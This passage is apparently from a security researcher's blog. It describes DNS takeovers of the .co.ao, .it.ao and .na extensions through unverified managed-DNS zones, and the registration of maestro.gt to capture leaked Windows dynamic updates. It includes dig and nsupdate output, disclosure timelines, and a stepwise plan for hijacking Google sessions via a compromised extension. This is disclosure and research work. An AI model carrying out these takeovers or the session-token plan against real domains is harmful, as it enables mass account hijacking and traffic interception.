;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;co.ao.                IN    NS

;; Query time: 89 msec
;; SERVER: 199.242.242.199#53(199.242.242.199)
;; WHEN: Thu Feb  9 21:57:35 2017
;; MSG SIZE  rcvd: 23

The nameserver in question, ns01.backupdns.com, appeared to be run by a third party DNS hosting service called Backup DNS:

backupdns_homepageAfter some examination of this site it appeared to be a fairly aged DNS hosting service with an emphasis on hosting backup DNS servers in case of a failure on the primary nameserver. What piqued my interest to investigate was the DNS error code REFUSED which is often used as a response error when the nameserver simply does not have a zone stored for the specified domain (in this case the .co.ao domain). This is often dangerous because hosted DNS providers will often allow for DNS zones to be set up by any account with no verification of domain name ownership, meaning that anyone could create an account and a zone for .co.ao to potentially serve entirely new records.

Interested in seeing if this was possible I created an account on the website and turned their documentation page:

backupdns_documentationGiven the name of the site the set up instructions made sense. In order to create a zone for the .co.ao zone I had to first add the zone to my account via the domain management panel:

adding_co_ao_to_accountThis worked without any verification but there was still no zone data loaded for that particular zone. The next steps were to set up a BIND server on a remote host and configure it to be an authoritative nameserver for the .co.ao zone. Additionally, the server had to be configured to allow zone transfers from the BackupDNS nameserver so that the zone data could be copied over. The following diagrams show this process in action:

axfr_backupdns_1We start with our Master DNS Server (in this case a BIND server set up in AWS) and the target BackupDNS nameserver we want our zone to be copied into.

axfr_backupdns_2On a regular interval the BackupDNS nameserver will issue a zone transfer request (the AXFR DNS query). This is basically the nameserver asking “Can I have a copy of all the DNS data you have for .co.ao?“.

axfr_backupdns_3Since we’ve configured our master nameserver to allow zone transfers from the BackupDNS nameserver via the allow-transfer configuration in BIND the request is granted and the zone data is copied over. We have now created the proper .co.ao zone in the BackupDNS service!

Ok, so I’d like to pause for just a moment and point out that at this point, I really wasn’t thinking that this would work. This wasn’t the first time I’d tested for issues like this with various nameservers and previous attempts had ended unsuccessfully. That being said, just in case it did work the zone I had copied over was intentionally made with records that had a TTL of 1 second and a SOA record of only 60 seconds. This means that the records would be thrown quickly out of the cache and the DNS request would me remade shortly to another nameserver which was a legitimate one for the extension. If you ever undertake any testing of this nature I highly recommend you do the same in order to minimize caching bad DNS responses for people trying to access the target legitimately.

It, of course, did work and the BackupDNS nameserver immediately began serving DNS traffic for .co.ao. After I saw the service confirm the copy I did a quick query with dig to confirm:

$ dig NS google.co.ao @ns01.backupdns.com

; <<>> DiG 9.8.3-P1 <<>> NS google.com.ao @ns01.backupdns.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37564
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;google.co.ao.        IN    NS

;; AUTHORITY SECTION:
co.ao.        60    IN    SOA    root.co.ao. root.co.ao. 147297980 900 900 1800 60

;; Query time: 81 msec
;; SERVER: 199.242.242.199#53(199.242.242.199)
;; WHEN: Sun Feb 12 23:13:50 2017
;; MSG SIZE  rcvd: 83

Uh oh, that’s not good. I had originally placed a few NS records in the BIND zone file with the intention of delegating the DNS queries back to the legitimate nameservers but I screwed up the BIND config and instead of replying with a DNS referral the server replied with an authoritative answer of NXDOMAIN. This is obviously not great so I quickly deleted the zone from the BackupDNS service. Due to some annoying caching behavior of the BackupDNS service this took a few minutes longer than I would’ve liked but soon enough the service was again returning REFUSED for all queries for .co.ao. Luckily this took all took place at ~3:00 AM Angola time, this combined with the long TTL for the .co.ao TLD likely meant that very few users were actually impacted by the event (if any).

Phew.

Despite the road bump this confirmed that the extension was indeed vulnerable. I then turned back to the scan results I had collected and found that not only was .co.ao vulnerable but .it.ao, nic.ao, and reg.it.ao were vulnerable as well! it.ao is another domain extension for the country of Angola which is commonly used for out-of-country entities. reg.it.ao is the organization that runs the .it.ao and .co.ao extensions.

Given the large impact that could occur if these extensions were hijacked maliciously I decided to block other users from being able to add these zones to their own BackupDNS accounts. I added all the extensions to my own account but did not create any zone data for them, this ensured they were still returned the regular DNS errors with no results while still preventing further exploitation:

ao_hijack_proofAfter preventing immediate exploitation I then attempted to reach out to the owners of the .co.ao and .it.ao extensions. For more information on the disclosure process please see “Responsible Disclosure Timeline” below.

Hijacking a TLD – Compromising the .na TLD via WHOIS

While hijacking a nameserver for a domain extension is pretty useful for exploitation, there is a higher level of compromise that TLDs specifically can suffer from. Ownership of a TLD is outlined by the contacts listed on the WHOIS record which is hosted at the IANA Root Zone Database. As an attacker our main interest would be in getting the nameservers switched over to our own malicious nameservers so that we can serve up alternative DNS records for the TLD. IANA has a procedure for initiating this change for ccTLDs which can be found here. The important excerpt from this is the following:

The IANA staff will verify authorization/authenticity of the request and obtain confirmation from the listed TLD administrative and technical contacts that those contacts are aware of and in agreement with the requested changes. A minimum authentication of an exchange of e-mails with the e-mail addresses registered with the IANA is required.

The key note to make is that IANA will allow a nameserver change to be made for a TLD (just complete this form) if both the admin and technical contact on the WHOIS confirm via email that they want the change to occur.

In the interest of testing the security of this practice I enumerated all of the TLD WHOIS contact email address domains and used the TrustTrees script I wrote to look for any errors in the DNS configurations of these domains. After reading through pages of diagrams I found something interesting in the DNS for the .na TLD’s contact email domain (na-nic.com.na). The following is a diagram of the delegation paths for that domain:

na-nic.com.na_trust_tree_graphThe relevant section of this graph being the following:

zoomed-na-nic_com_naAs can be seen above, three nameservers for the domain all return fatal errors when queried. These nameservers, ns1.rapidswitch.com, ns2.rapidswitch.com and ns3.rapidswitch.com all belong to the managed DNS provider RapidSwitch. If we do a query in dig we can see the specific details of the error being returned:

$ dig NS na-nic.com.na @ns1.rapidswitch.com.

; <<>> DiG 9.8.3-P1 <<>> NS na-nic.com.na @ns1.rapidswitch.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 56285
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;na-nic.com.na.            IN    NS

;; Query time: 138 msec
;; SERVER: 2001:1b40:f000:41::4#53(2001:1b40:f000:41::4)
;; WHEN: Fri Jun  2 01:13:03 2017
;; MSG SIZE  rcvd: 31

The nameserver replies with a DNS REFUSED error code. Just as with the Angola domain extensions this error code can indicate that the domain is vulnerable to takeover if the managed DNS provider does not properly validate domains before users add them to their account. To investigate I created a RapidSwitch account and navigated to the “My Domains” portion of the website:

add_hosted_domain_buttonThe “My Domains” section contained an “Add Hosted Domain” button which was exactly what I was looking to do.

domain_added_banner_rapidswitchBy completing this process I was able to add the domain to my account without any ownership verification. It appeared that the only verification that occurs is a check to ensure that RapidSwitch is indeed listed as a nameserver for the specified domain.

Having the domain in my account was problematic because I then had to replicate the DNS setup of the original nameserver in order to prevent interruptions to the domain’s DNS (which hosts email, websites, etc for na-nic.com.na). Deleting the domain from my account would’ve made the domain vulnerable to takeover again so I had to clone the existing records as well.

Once the records were created I added some records for proof.na-nic.com.na in order to verify that I had indeed successfully hijacked the DNS for the domain. The following dig query shows the results:

$ dig ANY proof.na-nic.com.na @ns2.rapidswitch.com

; <<>> DiG 9.8.3-P1 <<>> ANY proof.na-nic.com.na @ns2.rapidswitch.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49573
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 4, ADDITIONAL: 4
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;proof.na-nic.com.na.        IN    ANY

;; ANSWER SECTION:
proof.na-nic.com.na.    300    IN    A    23.92.52.47
proof.na-nic.com.na.    300    IN    TXT    "mandatory was here"

;; AUTHORITY SECTION:
na-nic.com.na.        300    IN    NS    ns1.rapidswitch.com.
na-nic.com.na.        300    IN    NS    ns3.rapidswitch.com.
na-nic.com.na.        300    IN    NS    oshikoko.omadhina.net.
na-nic.com.na.        300    IN    NS    ns2.rapidswitch.com.

;; ADDITIONAL SECTION:
ns1.rapidswitch.com.    1200    IN    A    87.117.237.205
ns3.rapidswitch.com.    1200    IN    A    84.22.168.154
oshikoko.omadhina.net.    3600    IN    A    196.216.41.11
ns2.rapidswitch.com.    1200    IN    A    87.117.237.66

;; Query time: 722 msec
;; SERVER: 2001:1b40:f000:42::4#53(2001:1b40:f000:42::4)
;; WHEN: Sat Jun  3 17:33:59 2017
;; MSG SIZE  rcvd: 252

As can be seen above, the TXT record (and A record) is successfully returned indicating that the DNS hijacking issue is confirmed. In a real world attack the final step would be to DDoS the remaining legitimate nameserver to eliminate competition for DNS responses (a step we obviously won’t be taking)*.

After this I reached out to the .na TLD contacts to report the vulnerability and get it fixed as soon as possible. For more information on this disclosure timeline see the “Responsible Disclosure Timeline” section below.

*There is one more issue with our attack plan, unlike *.it.ao and *.co.ao the na-nic.com.na domain has DNSSEC enabled. This is actually something that I didn’t even notice at first because my resolver doesn’t support DNSSEC. After trying it on a few different networks it appears that almost every resolver I used does not actually enforce DNSSEC properly (which surprised me quite a bit). After doing some more research it appears that global adoption is quite low for DNS resolvers which explains this behavior. So, depending on resolver configurations our attack may be complicated by this issue! We’ll discuss this further in the final conclusions section below. That being said, nice job to the admin setting it up!

The Impact of a TLD/Domain Extension Takeover

Universal Authentication & International Domains

Despite these vulnerabilities affecting an extension for the country of Angola and Namibia the effects are much farther reaching than just these countries. For example, many popular online services will have multiple homepages with domain extensions of the local country/area to give the site a more local feeling. Many of these sites will tie all of these homepages together with a universal authentication flow that automatically logs the user into any of the homepage despite them all being separate domains.

One example of this is Google which has search homepages with many extensions (here is a link which appears to have aggregated them all). One of these, of course, is google.co.ao:

google_co_aoAnother being google.com.na:

google-naIn order to provide a more seamless experience you can easily log yourself into any Google homepage (if you were already authenticated to Google on another homepage) by just clicking the blue button on the top right corner of the homepage. This button is just a link similar to the following:

https://accounts.google.com/ServiceLogin?hl=pt-PT&passive=true&continue=https://www.google.co.ao/%3Fgws_rd%3Dssl

Visiting this link will result in a 302 redirect to the following URL:

https://accounts.google.co.ao/accounts/SetSID?ssdc=1&sidt=[SESSION_TOKEN]&continue=https://www.google.co.ao/?gws_rd=ssl&pli=1

This passes a session token in the sidt parameter which logs you into the google.co.ao domain and allows the authentication to cross the domain/origin barrier.

What this means for exploitation however, is that if you compromise any Google homepage domain extension (of which Google trusts approximate ~200) then you can utilize the vulnerability to begin hijacking any Google account from any region. This is a bizarre threat model because it’s quite likely that you’d be able to exploit one of the 200 domain extension nameservers/registries before you could get a working Google account exploit in their standard set of services. After all, Google has a large security team full of people constantly auditing their infrastructure where as many TLDs and domain extensions are just run by random and often small organizations.

This is simplifying it quite a bit of course. In order to actually abuse a DNS hijacking vulnerability of this type you would have to complete the following steps (all in a stealthy manner as to not get caught too quickly):

  • Compromise a domain extension’s nameserver or registry to gain the ability to modify nameservers for your target’s website.
  • Begin returning new nameservers which you control for your target domain with an extremely long TTL (BIND’s resolver supports up to a week by default). This is important so that we can get cached in as many resolvers as possible, we also want to set a low TTL for the actual A record resolution for the google.co.ao/google.com.na sub-domains so that we can switch these over quickly when we want to strike.
  • Once we’ve heavily stacked the deck in our favor we must now get a valid SSL certificate for our google.co.ao/google.com.na domain name. This is one of the trickiest steps because certificate transparency can get us caught very quickly. The discussion around certificate transparency, and getting a certificate without being logged in certificate transparency logs is a long one but suffice to say that it’s not going to be as easy as it was.
  • We now set up multiple servers to host the malicious google.co.ao/google.com.na site with SSL enabled and switch all of the A record responses to point to our malicious servers. We then begin our campaign to get as many Google users as possible to visit the above link to give us their authentication tokens, depending on the goal this may be a more targeted campaign, etc. One nice part about this attack is the victims don’t even have to visit the URL – any tag requests (e.g. anything that causes a GET request) will complete the 302 redirect and yield what we’re looking for.

Widespread Affects – A Tangled Web

One other thing to consider is that not only are all *.co.ao, *.it.ao, and *.na domain names vulnerable to DNS hijacking but also anything that depends on these extensions may have become vulnerable as well. For example, other domains that utilize *.co.ao/*__.it.ao/*.na nameserver hostnames can be poisoned by proxy (though glue records may make this tricky). WHOIS contacts which reflect domains from these extensions are also in danger since WHOIS can be used to pull domains from owners and issue SSL certificates. Moving up the layers of the stack things like HTTP resource includes on websites reveal just how entangled the web actually is.

Conclusions & Final Thoughts

I hope that I’ve made a convincing argument that the security of domain extensions/TLDs is not infallible. Keep in mind that even with all of these DNS tricks the easiest method is likely just to exploit a vulnerability in a service running on a domain extension’s nameservers. In my opinion I believe the following steps should be taken by Internet authorities and the wider community to better secure the DNS:

  • Require phone confirmation for high impact changes to TLDs in addition to the minimum requirement of email confirmation from the WHOIS contacts.
  • Set more strict requirements for TLD nameservers – limiting exposure of ports to just UDP/TCP port 53.
  • Perform continual automated auditing of TLD DNS and notify TLD operators upon detection of DNS errors.
  • Inform domain owners about the risks of buying into various domain extensions/TLDs and keep a record of past security incidents so that people can make an informed decision when purchasing their domains. A high emphasis on things like response times and time to resolve the alleged security incidents are important to track as well.
  • Raise greater awareness of DNSSEC and push DNS resolvers to support it. The adoption for DNSSEC is incredibly poor and if implemented by both the domain and the resolver being used it can thwart some of these hijacking issues (assuming the attacker hasn’t compromised the keys as well). Speaking from personal experience, I don’t even notice DNSSEC failures because virtually no network (mobile, home, etc) that I use actually enforces it. I won’t get into the longer arguments around DNSSEC as a whole but suffice to say it would definitely be an additional layer of protection against these attacks.

Given the political complications when it comes to ccTLDs some of the enforcement of policies is undoubtedly tricky. While I believe that the above list would improve security I also understand that actually ensuring these things happen is also tough especially with so many parties involved (it’s always easier said than done). That being said, it’s important to weigh the safety of the DNS against the appeasement of the parties involved. Given the incredibly large attack surface I’m surprised that compromise of TLDs/domain extensions isn’t a more frequent event.

Responsible Disclosure Timeline

Angola *.it.ao & *.co.ao Takeover Disclosure

  • Febuary 14, 2017: Reached out via reg.it.ao contact form requesting security contact and PGP key to report vulnerability.
  • Febuary 15, 2017: Reply received with PGP ID specified and PGP encryption requested.
  • Febuary 15, 2017: Sent full details of vulnerability in PGP-encrypted email.
  • Febuary 21, 2017: Emailed Google security team about account takeover issue due to co.ao hijacking advising they turn off universal homepage authentication flow for google.co.ao to prevent Google accounts from being hijacked.
  • Febuary 22, 2017: Emailed BackupDNS owner requesting help to block these zones from being added to arbitrary BackupDNS accounts.
  • Febuary 22, 2017: BackupDNS owner replies stating he will put a block in place which requires admin approval to add zones to user accounts.
  • Febuary 22, 2017: Confirmed with BackupDNS owner that I am no longer able to add the zones to my account.
  • Febuary 24, 2017: Received reply stating the problem has been fixed by removing BackupDNS’s nameservers from the list of authoritative nameservers.

Namibia TLD *.na Takeover Disclosure

  • June 3, 2017: Emailed the contacts on the .na WHOIS contact inquiring about the proper place to disclose a security vulnerability in the .na TLD’s WHOIS contact email domains.
  • June 3, 2017: Received confirmation that the admin contact was the appropriate source to disclose this issue.
  • June 3, 2017: Disclosed the issue to the admin contact.
  • June 3, 2017: Vulnerability remediated by changing the nameservers for the na-nic.com.na domain and removing the RapidSwitch nameservers altogether.

Disclosure Note: This was an incredible turnaround time with the issue being received and fixed in just a few hours. In situations such as these I expect the turnaround to be weeks to months but due to the responsiveness of the operator this was remediated ASAP. Preventing all security issues isn’t possible but reacting quickly to existing ones with haste says a lot, hats off to the DNS admin of the .na TLD!

Guatemala_City_(663)Guatemala City, By Rigostar (Own work) [CC BY-SA 3.0], via Wikimedia Commons.

UPDATE: Guatemala has now patched this issue after I reached out to their DNS administrator (and with a super quick turnaround as well!)

In search of new interesting high-impact DNS vulnerabilities I decided to take a look at the various top-level domains (TLDs) and analyze their configurations for errors. Upon some initial searching it turns out there is a nice open source service which helps DNS administrators scan their domains for misconfigurations called DNSCheck written by The Internet Foundation in Sweden. This tool helps highlight all sorts of odd DNS misconfigurations such as having an authoritative nameserver list mismatch between a domain’s authoritative nameservers and the nameservers set at the parent TLD nameservers (this was the issue causing the domain takeover vulnerabilities in iom.int and sen.gov covered in a previous post). While it doesn’t explicitly point out vulnerabilities in these domains it does let us know if something is misconfigured which is as good a place as any to start.

As of the time of this writing there are ~1,519 top level domains. Instead of scanning each TLD one by one by hand I opted to write a script to automate scanning all the TLDs. The output of the results of this script can be found under my Github repo titled TLD Health Report. The script was designed to highlight which TLDs have the most serious misconfigurations. After spending an hour or two reviewing the TLDs with configuration errors I came across an interesting issue with the .gt TLD. The error can be seen on this Github page and is as follows:

Soa Scan

Errors:

  • No address found for maestro.gt. No IPv4 or IPv6 address was found for the host name.

Warnings:

  • Error while checking SOA MNAME for gt. (maestro.gt). The SOA MNAME is not a valid host name.

Notices:

  • SOA MNAME for gt. (maestro.gt) not listed as NS. The name server listed as the SOA MNAME is not listed as a name server.

…trimmed for brevity…

As can be seen from the above, multiple errors and warnings state that the domain name maestro.gt is not routable and is an invalid primary master nameserver (MNAME) for the .gt TLD. We can see this configuration in action by doing the following dig command:

mandatory@script-srchttpsyvgscript ~/P/gtmaster> dig SOA randomdomain.gt

; <<>> DiG 9.8.3-P1 <<>> SOA randomdomain.gt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1444
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;randomdomain.gt.        IN    SOA

;; AUTHORITY SECTION:
gt.            0    IN    SOA    maestro.gt. alejandra.reynoso.cctld.gt. 2017012900 3600 600 604800 14400

;; Query time: 43 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sun Jan 29 16:11:57 2017
;; MSG SIZE  rcvd: 101

As can be seen above, we receive an NXDOMAIN error (because the domain we requested does not exist) and along with it we get a statement of authority (SOA) record with maestro.gt listed as the master nameserver. Any requests for a non-existent domains under the .gt TLD will return a SOA record with this domain in it.

“Unresolvable” is Just Another Word for “Not Resolvable Yet

If you’ve read some of the previous posts on DNS vulnerabilities that I’ve written you may have already guessed why this domain isn’t resolving. It’s because it doesn’t exist! As it turns out, it’s also open for registration. With a bit of searching and Google Translate I found that it was available for registration from the “Registro de Dominios .gt.” for around 60$ a year (with a minimum of two years registration).

gt_registry

Would you believe they take Visa?

visa_mastercard_accepted

While pricey, the registration was quick and completely automated which is more than I can say for many other TLDs in Central America. The only drawback was that my debit card was immediately frozen for questionable activity and I had to go online to unfreeze it so that the order could go through:

Apparently buying a Guatemalan domain name at 1:30 AM is grounds for your card being frozen.

Listening for Noise

Due to the SOA MNAME being sort of an esoteric feature of DNS I wasn’t sure what to expect in terms of DNS traffic. It was unclear from casual Googling what types of DNS clients and services would actually make use of this field for anything at all. For this reason I configured my Bind DNS server to answer all A record queries for any domain under .gt with the IP address of my server as a general catch-all. I set up tcpdump to dump all DNS traffic into a pcap file for later analysis and let the box sit overnight.

What I found in the morning was far from expected, when I checked the pcap data I found that computers from all over the country of Guatemala were sending DNS queries to my server:wireshark_trafficWhat in the world is going on? Looking further into the results only appears to yield more confusion:

srv_update_queryA majority of the traffic was in DNS UPDATE queries from internal network IP addresses. The above is an example DNS UPDATE request attempting to update the zone of my DNS server to include an SRV record for an internal LDAP server belonging to a random government network in Guatemala.

So, why all of the DNS queries? If you’re familiar with what _ldap._tcp.dc._msdcs is for then you may have already spotted the forest from the trees.

Understanding Windows Active Directory Domains

To understand why we are getting this traffic we have to take a quick diversion to learn about Windows Active Directory (AD) Domains and DDNS (Dynamic DNS).

Windows domains are structured in much the same way as Internet domain names are structured. When creating a Windows domain you must specify a DNS suffix. This DNS suffix is comparable to a base-domain, with all of the sub-domains being either child domains or simply hostnames of machines under the parent domain. As an example, say we have a Windows domain of thehackerblog.com and we have a two Windows Active Directory (AD) networks under this parent domain: east and west. In this structure we would set up two domains under the parent domain of thehackerblog.com as east.thehackerblog.com and west.thehackerblog.com. If we had a dedicated web-server for internal company documentation for the east office under this domain it might have a hostname of documentation.east.thehackerblog.com. In this way we build up a domain-tree of our network, much how is done with the Internet’s DNS. The following is our example network as a tree:

thehackerblog_network_diagramThese hostnames like documentation.east.thehackerblog.com allow computers and people to easily find each other in this network. The network’s DNS server will take these human-readable hostnames and turn them into IP addresses of the specific machines so that your computer knows where to request the information you’re looking for. So when, for example, you type in the internal website URL of documentation.east.thehackerblog.com into your web browser, your computer asks the network’s DNS server for the IP address of this hostname in order to find it and route traffic to it.

Given this structure a problem does arise. Since machine IP addresses can often change on these networks, what happens when the server behind documentation.east.thehackerblog.com suddenly has a change in IP (say due to a new DHCP lease, etc)? How can the network’s DNS servers figure out the new IP address of this machine?

Understanding Windows Dynamic Update

Window’s Active Directory networks solve this problem by the use of something called Dynamic Update. Dynamic update at a core is actually very simple. In order to keep records such as documentation.east.thehackerblog.com always fresh and accurate, occasionally these servers will reach out the network’s DNS server and update their specific DNS records. For example, if the documentation.east.thehackerblog.com IP address suddenly changed, this server would reach out to the domain’s DNS server and say “Hey! My IP changed, please update the documentation.east.thehackerblog.com record to point to my new IP so people know where I am!”. A real world comparable situation would be a person moving apartments and having to notify their friends, workplace, and online shopping outlets of this new location to reach them at via mail.

The process for this a bit technical (I’ve summarized it below) and is as follows (quoted from “Understanding Dynamic Update“):

  • The DNS Client service sends a start of authority (SOA)–type query using the DNS domain name of the computer.
    • The DNS Client service sends a start of authority (SOA)–type query using the DNS domain name of the computer.
  • The client computer uses the currently configured FQDN of the computer (such as newhost.tailspintoys.com) as the name that is specified in this query.
    • For standard primary zones, the primary server (owner) that is returned in the SOA query response is fixed and static. It always matches the exact DNS name as it appears in the SOA resource record that is stored with the zone. If, however, the zone being updated is directory integrated, any DNS server that is loading the zone can respond and dynamically insert its own name as the primary server (owner) of the zone in the SOA query response.
  • The DNS Client service then attempts to contact the primary DNS server.
    • The client processes the SOA query response for its name to determine the IP address of the DNS server that is authorized as the primary server for accepting its name. It then proceeds to perform the following sequence of steps as needed to contact and dynamically update its primary server
      • It sends a dynamic update request to the primary server that is determined in the SOA query response.

        If the update succeeds, no further action is taken.

      • If this update fails, the client next sends a name server (NS)–type query for the zone name that is specified in the SOA record.
      • When it receives a response to this query, it sends an SOA query to the first DNS server that is listed in the response.
      • After the SOA query is resolved, the client sends a dynamic update to the server that is specified in the returned SOA record.

        If the update succeeds, no further action is taken.

      • If this update fails, the client repeats the SOA query process by sending to the next DNS server that is listed in the response.
  • After the primary server that can perform the update is contacted, the client sends the update request and the server processes it.

    The contents of the update request include instructions to add host (A) (and possibly pointer (PTR)) resource records for newhost.tailspintoys.com and to remove these same record types for oldhost.tailspintoys.com, the name that was registered previously.

    The server also checks to ensure that updates are permitted for the client request. For standard primary zones, dynamic updates are not secured; therefore, any client attempt to update succeeds. For AD DS-integrated zones, updates are secured and performed using directory-based security settings.

The above process is long-winded and can be a lot to consume at first so I’ve bolded the important sections. Summing this up the client does the following:

  • A SOA query with the full hostname of the current machine is sent to the network DNS server by the host. In our previous example this would be a query containing documentation.east.thehackerblog.com as a hostname.
  • The network’s DNS server receives this request and replies with a SOA record of its own which specifies what the hostname of the master nameserver is. This may be something like ns1.thehackerblog.com, for example.
  • The client then parses this SOA record and then reaches out to ns1.thehackerblog.com specified in the previous server’s SOA MNAME reply with the DNS update/change it would like to make.
  • The ns1.thehackerblog.com DNS server receives this update and changes its records to match accordingly. The DNS record for documentation.east.thehackerblog.com now points to the host’s new IP address and everything routes properly again!

Windows Domain Naming Conventions & Best Practice Guidelines

The final piece of information we need to absorb before we understand our Guatemalan DNS anomaly is the following requirement for Windows domains:

“By default, the DNS client does not attempt dynamic update of top-level domain (TLD) zones. Any zone that is named with a single-label name is considered to be a TLD zone, for example, com, edu, blank, my-company. To configure a DNS client to allow the dynamic update of TLD zones, you can use the Update Top Level Domain Zones policy setting or you can modify the registry.”

So by default you can’t have a Windows domain of companydomain, for example, because it’s single-label and is considered by Windows to be a top level domain (TLD) like .com, .net, or .gt. While this setting can (hopefully) be disabled on each individual DNS client (read: every computer in your network), it’s much easier just to have a domain of companydomain.com. While not all companies follow this direction, it is highly recommended because having a single-label domain could potentially cause many conflictions down the line if your internal network domain ends up being registered as a top-level domain in the Internet’s DNS root zone (an issue known as Name Collision which was, and continues to be, a hotly discussed topic in Internet discussions).

Putting it All Together – Becoming Master of Your Domain!

Now that we have all of this information, the situation becomes quite a bit more clear. The country of Guatemala like has many Windows networks which have internal Windows domains that are sub-domains of the .gt TLD. For example, if Microsoft had an office in Guatemala their internal network domain might be something like microsoftinternal.com.gt. _These machines periodically make dynamic DNS updates to their network DNS server to ensure that all of the network’s hostnames are up-to-date and routing properly. For a variety of reasons such as prevention of name collisions with external company Internet sub-domains, it’s also likely that many networks make use of internal network domains which don’t exist on the wider Internet. For example in this case Microsoft may use an internal active directory domain name such as _microsoftinternal.com.gt since hosts under this domain wouldn’t ever have naming conflicts with external Internet sub-domains for microsoft.com.gt.

The issue is, many subtle DNS misconfigurations can cause DNS requests which should be for the internal domain’s DNS server, to hit the top level domain’s (TLD) servers instead. This issue is known as name collision and is a well-documented issue which is sometimes referred to as DNS queries “leaking”. If a machine uses a DNS resolver which is not aware of the internal network’s DNS setup, or is misconfigured to pass these queries on to the outer-Internet’s DNS servers then these queries are leaked to the .gt TLD servers since they are the delegated nameservers for that entire TLD space. The problem of name collisions is incredibly common and is the same reason why new TLDs are often put up to a large amount of scrutiny to make sure that they aren’t a common internal network domain name such as .local, .localhost, .localdomain, etc.

When this leaking occurs for an internal domain that is part of the .gt extension, the DNS UPDATE query sent by a machine attempting to update an internal DNS record accidentally is sent to the .gt TLD servers. Say, for example, we are a host on the microsoftinternal.com.gt internal domain and we send our DNS UPDATE query to a com.gt TLD server. The following is an example of this query performed with the nsupdate DNS command line tool (available on most OS X and Linux systems):

mandatory@script-srchttpsyvgscript ~/P/gtmaster> nsupdate -d
> prereq nxdomain printer.microsoftinternal.com.gt
> update add printer.microsoftinternal.com.gt 800 A 172.16.3.131
> send
Reply from SOA query:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id:  25175
;; flags: qr rd ra; QUESTION: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;printer.microsoftinternal.com.gt. IN    SOA

;; AUTHORITY SECTION:
com.gt.            0    IN    SOA    maestro.gt. alejandra.reynoso.cctld.gt. 2017012812 3600 600 604800 14400

Found zone name: com.gt
The master is: maestro.gt
Sending update to 52.15.155.128#53
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id:  62645
;; flags:; ZONE: 1, PREREQ: 1, UPDATE: 1, ADDITIONAL: 0
;; PREREQUISITE SECTION:
printer.microsoftinternal.com.gt. 0 NONE ANY    

;; UPDATE SECTION:
printer.microsoftinternal.com.gt. 800 IN A    172.16.3.131


Reply from update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOTAUTH, id:  62645
;; flags: qr; ZONE: 1, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;com.gt.                IN    SOA

> 

We can see that the query resulted in a NXDOMAIN error but regardless an SOA response is returned with maestro.gt as the master nameserver. Since this is exactly what the host was looking (e.g. it’s a valid SOA response to this query) it parses out maestro.gt MNAME and proceeds to send the DNS update query to the server behind maestro.gt hosted at 52.15.155.128 (my server). This query ends in failure because I’ve set up my DNS server to reject all update requests from clients (since I don’t want to actively interfere with these machines/networks). This is why all of these random machines are sending DNS update requests to my maestro.gt server.

What we have is essentially an new DNS issue which is the result of name collisions leading to dynamic DNS updates being sent to whatever server is listed under a TLD’s SOA record. Unlike regular name collisions though, we don’t need to register an entirely new TLD to exploit this issue we just need to register the domain name listed under an existing TLD’s SOA record (as we did with maestro.gt).

Try It Yourself – A Quick Lab

Note: Feel free to skip this section if you’re not interested in replicating these results personally.

If you’d like to see this behavior in action it’s actually fairly simple to replicate. We’ll use Windows 7 as our example OS inside of VMware along with Wireshark running to follow all the DNS traffic being sent by our machine.

To change your computer’s DNS suffix to match what a Guatemalan active directory domain might look like, go to Start > Computer > System Properties > Change Settings > Change > More and set the primary DNS suffix to any domain under the .gt TLD:

change_windows_computer_domain_windwosClick OK and apply this new setting, you will be prompted to restart your computer. Go ahead and do so and keep Wireshark running while Windows is starting up. You should see that during the startup process a few Dynamic Update queries are issued:

example_dns_update_request_chainThe above screenshot of my Wireshark output shows that the Windows VM did the following upon startup:

  • Attempts to query the 8.8.8.8 DNS resolver for the SOA of mandatory.dnsleaktestnetwork.com.gt (Resulting in an NXDOMAIN error because that record doesn’t exist on the public Internet which 8.8.8.8 is configured to query).
  • Windows then parses this NXDOMAIN response and finds a valid SOA MNAME record of maestro.gt in the response sent from the TLD.
  • Windows then reaches out to maestro.gt (my server) and attempts to do a DNS UPDATE request. This fails because my server is configured to refuse all of these requests.
  • Windows then attempts the entire process over again, this time in all capital letters instead (???).

We’ve now seen in-action exactly what goes on with these Windows machines that are hitting the maestro.gt server.

So, Just How Common Is This Issue?

Since Guatemala, and by proxy, the .gt domain space, is relatively small in comparison to the bigger top level domains such as .com, .net, .org, .us, etc we can only see a small fraction of the global number of DNS requests made due to this issue. On the larger scale, it’s likely that a huge amount of traffic is generated to many of the more-popular TLD nameservers from networks which utilize this TLD in their AD domain.

Luckily, while I haven’t been able to find any previous exploit research on Dynamic Update SOA hijacking specifically, we do have a great deal of past-research on name collisions in general. This is largely because of worries about newly issued TLDs conflicting with internal network domains which are utilized by computers/networks across the world. For a good overview of this problem and research into how widespread it is I recommend reading Name Collision in the DNS, a report commission by ICANN to better understand the name collision problem and its effects on the wider Internet. This reports contains lots of real-world data on just how big the name collision problem is and allows us a good base to extrapolate how widespread this specific SOA Dynamic Update variant is in the wild.

Perhaps the most damning piece of real world data that was collected and presented in this report is the following table:

